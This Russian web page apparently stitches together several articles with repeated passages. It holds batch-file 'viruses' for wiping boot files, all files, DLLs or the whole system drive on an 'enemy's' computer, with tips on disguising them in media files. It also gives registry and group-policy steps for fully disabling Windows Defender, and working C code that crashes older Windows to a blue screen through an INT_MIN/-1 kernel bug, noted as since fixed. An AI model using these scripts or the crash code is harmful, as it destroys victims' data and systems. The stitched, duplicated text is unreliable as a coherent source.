Как убить windows через реестр

Главная

» 2013 » Декабрь » 17 » 4 способа убить виндовс 7 и ПК

Как убить Windows, или батники-вредоносы на компьютере врага.

ВНИМАНИЕ! Следующая информация приведена только для ознакомительных целей. Применение и исполнение указанных приёмов может привести к повреждению операционной системы Windows. По своему действию созданные файлы исполняют вредоносный код,  уничтожающий важнейшие файлы на компьютере. Затираются жизненно важные файлы или все файлы полностью. 

Всем привет, это очередной компьютерный трюк от блога Компьютер76. Следующий трюк на самом деле таковым не является, ибо это самый настоящий вредонос, по исполнению которого произойдёт уничтожение жизненно важных системных файлов, после чего операционная система Windows перестанет существовать. Так что используйте его на свой страх и риск, и тем более не стоит запускать его на своём компьютере: воспользуйтесь виртуальной машиной. В конце статьи — небольшое для того видео на эту тему.

Все описываемые ниже команды — скрипты команд для консоли cmd, сохранённые в так называемый файл-батник (файл с расширением .bat). Такие файлы легко можно создавать с помощью обычного Блокнота, заставив систему в Свойствах папки показывать расширения файлов:

Принцип создания такого файла прост:

• создаёт текстовый файл
• пишем нужный код
• сохраняем документ, но вместо расширения .txt пишем .bat
• всё

Как убить Windows . Вариант первый: убиваем Windows XP .

Собственно, если внимательно присмотреться, то видно как этот код сможет убить именно windows xp, и почему он бесполезен для более поздних версий. Но приступим… Как всегда, перво-наперво создадим пустой документ Блокнота и внесём в поле следующий код:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
shutdown -r -f -t 00

Как видите, команды последовательно стирают системные файлы операционной системы windows xp, необходимые для загрузки системы и запуска . Так что восстановить систему будет, мягко говоря, трудновато. Человек должен вам сильно насолить, если вы решитесь использовать  » вирус » против кого бы-то ни было и убить windows . После запуска файла потребуется перезагрузка, чтобы система была уничтожена. Последняя в её жизни перезагрузка.

Как убить Windows . Вариант второй: убиваем Wndows любой версии.

Нам предстоит создать » вирусы «, которые, в свою очередь, удаляют либо абсолютно все файлы, либо затрагивают некоторые из директорий. Речь идёт о файлах как системных, так и личного характера (созданных, скачанных и т.д.) По своим качествам гораздо серьёзнее, нежели предыдущий вариант, ибо некоторую информацию с жёсткого диска придётся восстанавливать с помощью специальных программ. Это займёт (в зависимости от объёма винчестера) от 5-х до 20-ми минут, всё зависит от производительности компьютера и объёма удаляемых данных.

Для этого создадим документ Блокнота и в пустом поле впишем следующий код. Да какой там код — вот эту строчку:

@echo off
del *.*

Эта простая команда удаляет все файлы с любым существующим расширением. Узнавать, как оба «вируса» работают на вашем компьютере или ноутбуке, крайне не советую. Но список уничтожаемых файлов можно резко сократить, что не помешает убить windows навсегда, а времени жертве на раздумье не останется и горе-пользователь ничего не сможет предпринять. Просто не успеет. Команда сработает для версий windows 7/8.1 /10. Она, конечно, громоздка. И потому у этой команды есть вариации.

Так, в список уничтожаемых файлов достаточно внести жизненно важные для windows файлы с расширением .dll в папке System. Тогда код убийства windows будет иметь вид:

@echo off
del *.dll

Как убить Windows, удалив диск?

Нет, целый том вы не удалите. Спрятать можно. Но можно «почистить» его содержимое:

echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Основное назначение батника — вызвать BSOD, который должен быть неминуемой реакцией на удаление системных файлов. Однако его вы, скорее всего, не увидите: защищённые файлы система удалить не даст. Но нам это и не нужно. Процесс «наведёт порядок» везде, где только возможно, так что испортить Windows получится по-настоящему:

Как видите, несколько строчек кода, и система перестаёт существовать. К сожалению, на эту удочку может попасться каждый. Особенно, если это происходит на фоне факта, когда злоумышленнику не составит никакого труда спрятать простенький батник в любой файл, замаскировав его в видео или аудио ролик, рисунок, фотографию или даже текстовый файл. Подробнее это, например, описано в статье Как спрятать троян в рисунок. Будьте бдительны.

Успехов

Ещё больше компьютерных приколов

По умолчанию в операционной системе Windows 10 функционирует «Защитник», фирменная антивирусная утилита от  Microsoft. Разработчики предполагали, что Защитник Windows 10 станет незаменимым приложением, способным полностью обезопасить пользователей от потенциальных угроз, но все пошло не по плану.

Несомненно, Defender блокирует некоторые угрозы, но зачастую их список настолько мал, что проще установить сторонний бесплатный антивирусник. Кроме того, на слабых компьютерах процесс Antimalware Service Executable, отвечающий за защиту системы, часто «забивает» процессор на 50 и более процентов, что сильно сказывается на производительности компьютера. Сюда же входит и повышенная нагрузка на жесткий диск. Именно такие проблемы чаще всего наводят пользователей на отключение Защитника Windows 10.

Деактивировать Защитник не так уж и просто, так как доступная опция отключения защиты позволяет выключить программу только на время – после перезагрузки системы она снова будет активна. Однако нет ничего невозможного: есть два эффективных способа, которые позволяют полностью отключить встроенную защиту.

Рассмотрим способы временной и полной деактивации. 

Способ 1: Через настройки безопасности Windows

Обратите внимание, что данный способ деактивирует Защитник лишь на время. Как только компьютер будет перезагружен, Defender автоматически включится, и для его отключения снова потребуется открыть настройки системы.

Выключаем Защитник Windows 10:

1. Первым делом нам потребуется перейти в настройки системы – для этого кликаем правой кнопкой мыши по меню «Пуск» и выбираем «Параметры». Также попасть в данный раздел можно с использованием комбинации клавиш «WIN+I», где WIN – клавиша, расположенная в нижнем левом углу клавиатуры с логотипом Windows.
2. Переходим в раздел «Обновление и безопасность».
3. Следующим шагом открываем подраздел «Безопасность Windows» и выбираем «Защита от вирусов и угроз». Обратите внимание, что в моем случае иконка горит красным цветом – в вашей системе она будет зеленой, так как защита системы активна.
4. В правой части кликаем по кнопке «Параметры защиты от вирусов и других угроз».
5. В версии 1903 операционной системы Windows 10 появилась функция «Защита от подделки», которая блокирует изменения настроек безопасности. Для того чтобы вручную отключить «Защитник», для начала нужно выключить данную опцию.
6. Остается в блоке «Защита в режиме реального времени» установить ползунок в режим «Откл.».

Готово! Теперь Защитник Windows 10 полностью отключен до перезагрузки компьютера. Таким образом, вы можете установить программу или открыть сайт, который был заблокирован системой ранее. Будьте бдительны – посещение небезопасных сайтов и установка подозрительного ПО может навредить вашей системе.

Способ 2: Через групповые политики

Данный способ подойдет исключительно для версий Windows 10 Pro и Enterprise – с его помощью можно навсегда отключить встроенный антивирус. Для прочих версий системы воспользуйтесь редактором реестра, о котором мы поговорим в следующем разделе.

Отключаем Windows Defender:

1. Воспользуемся комбинацией клавиш «WIN+R», чтобы открыть окно «Выполнить» – в него вводим запрос gpedit.msc и жмем «Enter».
2. Далее раскрываем пункт «Конфигурация компьютера» и переходим в подраздел «Административные шаблоны» – там выбираем «Компоненты Windows» и открываем «Антивирусная программа Microsoft Defender». В отобразившемся разделе кликаем двойным щелчком мыши по пункту «Выключить антивирусную программу Microsoft Defender».
3. Отмечаем пункт «Включено», чтобы активировать параметр деактивации антивируса, и жмем «ОК».
4. Последним действием переходим в подраздел «Защита в режиме реального времени» и отключаем параметры, указанные на картинке. Просто заходим в каждый из них и отмечаем пункт «Отключено».

После выполнения вышеупомянутых действий перезагружаем компьютер и убеждаемся, что встроенная система защиты была полностью отключена. Если она до сих пор работает, то перепроверьте правильность выполнения действий либо воспользуйтесь следующим способом.

Также обратите внимание на то, что после деактивации программы ее иконка все равно будет отображаться в области уведомлений на панели задач. Чтобы ее отключить, необходимо перейти в «Диспетчер задач» через правый клик кнопки по панели задач и переключить параметр «Windows Security notification icon» в состояние «Отключено».

В любой момент вы сможете восстановить работу встроенного антивируса – достаточно зайти в редактор групповых политик и вернуть параметрам стандартное значение.

Способ 3: Через реестр

Если вы никогда не работали в редакторе реестра, то не рекомендую отходить от нижеуказанной инструкции. 

Деактивируем Защитник Windows:

1. Открываем окно «Выполнить» с помощью комбинации клавиш «WIN+R» и вводим запрос regedit.
2. Разрешаем приложению вносить изменения и попадаем в его главное меню. В верхнюю строку вставляем следующий путь: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender. Создаем здесь новый параметр DWORD (32 бита) со значением 1. Задаем ему название DisableAntiSpyware и жмем «ОК».
3. Затем в левой части кликаем правой кнопкой мыши по папке «Windows Defender» и создаем новый раздел с названием Real-Time Protection.
4. Следующим шагом создадим 4 параметра DWORD (32 бита): DisableBehaviorMonitoring, DisableOnAccessProtection, DisableScanOnRealtimeEnable, DisableIOAVProtection. Всем параметрам выставляем значение 1.

Перезагружаем компьютер и проверяем работоспособность Защитника – он должен быть выключен.

Если вы захотите вернуть Windows Defender к жизни, то полностью удалите раздел Real-Time Protection, а также параметр DisableAntiSpyware в папке «Windows Defender». После этого потребуется перезагрузить операционную систему.

Как видите, отключить встроенный активирус в ОС Windows 10 несложно. Рекомендуем не оставлять свой компьютер без надежного защитника: если вы любитель «походить» по небезопасным ресурсам, то вам непременно потребуется антивирусная программа, которая защитит систему от угроз.

Надеюсь, что у вас не возникло никаких проблем при выполнении вышеуказанных действий. Спасибо за внимание!

Как убить windows . Вариант первый. Убиваем windows xp .

Собственно, если внимательно присмотреться, то видно как этот код сможет убить windows xp, и почему он бесполезен для более поздних версий. Но приступим… Как всегда, перво-наперво создадим пустой документ Блокнота и внесём в поле следующий код:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Как видите, команды последовательно стирают системные файлы операционной системы windows xp, необходимые для загрузки системы и запуска . Так что восстановить систему будет, мягко говоря, трудновато. Человек должен вам сильно насолить, если вы решитесь использовать » вирус » против кого бы-то ни было и убить windows . После запуска файла потребуется перезагрузка, чтобы система была уничтожена. Последняя в её жизни перезагрузка.
Как убить windows . Вариант второй. Убиваем windows любой версии.

Нам предстоит создать » вирус «, который, в свою очередь, удалит абсолютно все файлы. Речь идёт о файлах как системных, так и личного характера (созданных, скачанных и т.д.) По своим качествам гораздо серьёзнее, нежели предыдущий вариант, ибо информацию с жёсткого диска придётся восстанавливать с помощью специальных программ. Это займёт (в зависимости от объёма винчестера) от 3-х до 8-ми минут, так что у вас (или врага) будет время подумать, где достать корвалол.
Для этого создадим документ Блокнота и в пустом поле впишем следующий код. Да какой там код — вот эту строчку:
@echo off
del *.*
Эта простая команда удаляет все файлы с любым существующим расширением. Узнавать, как оба «вируса» работают на вашем компьютере или ноутбуке, крайне не советую. Но список уничтожаемых файлов можно резко сократить, что не помешает убить windows навсегда, а времени жертве на раздумье не останется и горе-пользователь ничего не сможет предпринять. Просто не успеет. Команда сработает для версий windows 7 / 8.1 / 10.
Так, в список уничтожаемых файлов достаточно внести жизненно важные для windows файлы с расширением .dll в папке System. Тогда код убийства windows будет иметь вид:
@echo off
del *.dll
В любом случае сохраните получившиеся вирусы под любыми именами с расширением .bat и повторите традиционные шаги по сокрытию вирусов известными вам способами.

Время на прочтение
3 мин

Количество просмотров 265K

См. также: Microsoft исправила уязвимость с синим экраном

Однажды один знакомый рассказал мне про одну уязвимость в Windows. А именно из-за нее можно легко вызвать синий экран

смерти

шестью строчками кода на Си. Причем программа не требует никаких прав администратора и вызывает только одну функцию масштабирования окна.

Немного теории

В случае недопустимой инструкции процессор бросает исключение, а ОС уже сама решает, что с этим делать. Если это ошибка в программе и она никак не обрабатывается, то система выдает всем известное сообщение о том, что прекращена работа программы.

Например, в этом коде деление на ноль — недопустимая инструкция.

#include <stdio.h>

int main()
{
    int a = 2 / 0;
    printf ("%d", a);
    return 0;
}

Если скомпилировать этот код без оптимизации, то мы увидим то самое окно о прекращении работы программы (конечно, компилятор выдаст warning).

Если же выполняется недопустимая инструкция в ядре системы, то все немного интереснее: мы увидим синий экран.

INT_MIN / -1

Есть еще одна исключительная инструкция — деление INT_MIN на -1.
Дело в том, что INT_MIN=−2,147,483,648=-2³¹, а INT_MAX=2,147,483,647=2³¹-1. Довольно очевидно, почему они отличаются на единицу: невозможно в int запихнуть ноль, множество положительных чисел и множество отрицательных чисел так, чтобы количество положительных и отрицательных чисел было равно.
Получается, при делении INT_MIN на -1 результат не умещается в int и процессор бросает исключение.

Следующий код, скомпилированный без оптимизации, вызывает исключительную инструкцию:

#include <stdio.h>
#include <limits.h>

int main()
{
    int a = INT_MIN;
    int b = -1;
    int c = a / b;
    printf ("%d", c);
    return 0;
}

Ядро Windows

В ядре Windows принято не использовать переменные с плавающей точкой. Прямо вообще-вообще не использовать. Поэтому когда приходится работать с чем-то нецелым, используют две целочисленные переменные: числитель и знаменатель.
Также для увеличения производительности некоторые WinAPI функции, вызываемые программой, выполняются в ядре системы. Пример такой функции — ScaleWindowExtEx. Она ничего особенного не делает — функция масштабирует окно.
Прототип функции:

BOOL ScaleWindowExtEx(
  _In_   HDC hdc,
  _In_   int Xnum,
  _In_   int Xdenom,
  _In_   int Ynum,
  _In_   int Ydenom,
  _Out_  LPSIZE lpSize
);

Сама программа

Отлично, это то, что нам нужно. Второй и третий параметры, четвертый и пятый параметры — это как раз числитель и знаменатель.
Xnum / Xdenom — масштабирование по x.
Ynum / Ydenom — масштабирование по y.
Но функция не всегда делит одно число на другое. Функция будет делить одно число на другое в случае, если разметка контекста рисования (device context) располагается справа налево. В противном случае она, видимо, будет перед делением как-то менять эти числа. Чтобы поменять разметку контекста, есть функция SetLayout.
Значит, создаем контекст рисования вызовом CreateCompatibleDC (NULL). Устанавливаем разметку контекста с помощью SetLayout. После чего вызываем функцию ScaleWindowExtEx с нужными параметрами.
Конечно, программисты Майкрософт

не полные дебилы

проверяют деление на ноль, и передачей третьим параметром числа ноль Windows не уронишь.
Но вот деление INT_MIN на -1 они не проверяют. Из-за чего происходит необработанное исключение в ядре системе, что приводит к синему экрану.
Такой код программы при добавлении библиотеки gdi32.lib уронит Windows:

#include <windows.h>
#include <limits.h>

int main()
{
	HDC dc = CreateCompatibleDC (NULL);
	SetLayout (dc, LAYOUT_RTL);
	ScaleWindowExtEx (dc, INT_MIN, -1, 1, 1, NULL);
}

Его можно подсократить до шести строчек для добавления пафосного заголовка:

#include <windows.h>
int main() {
	HDC dc = CreateCompatibleDC (NULL);
	SetLayout (dc, LAYOUT_RTL);
	ScaleWindowExtEx (dc, -2147483647 - 1, -1, 1, 1, NULL);
}

Тут INT_MIN заменен на -2147483648, чтобы не добавлять лишнюю строчку, подключая файл limits.h. Конечно, можно код сократить до двух строчек, но тогда он уже будет совсем нечитабелен. Да и все функции на Си всегда можно сократить в одну очень-очень длинную строчку.

Система падает на Windows Vista, 7 и 8. Баг наблюдался как на 32-разрядной системе, так и на 64-разрядной (хотя на 64-разрядной не всегда этот баг наблюдается).

P.S. Раньше с помощью такой недопустимой инструкции можно было убить bash, но сейчас это исправили.

UPDATE1: Изменил ((int) 0x8000/0x80000000) на (-2147483647 — 1), теперь должно работать. Спасибо, AndreyDmitriev и alper.
UPDATE2: Microsoft исправила эту уязвимость.
UPDATE3: Ссылка на статью «первооткрывателя»: blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html.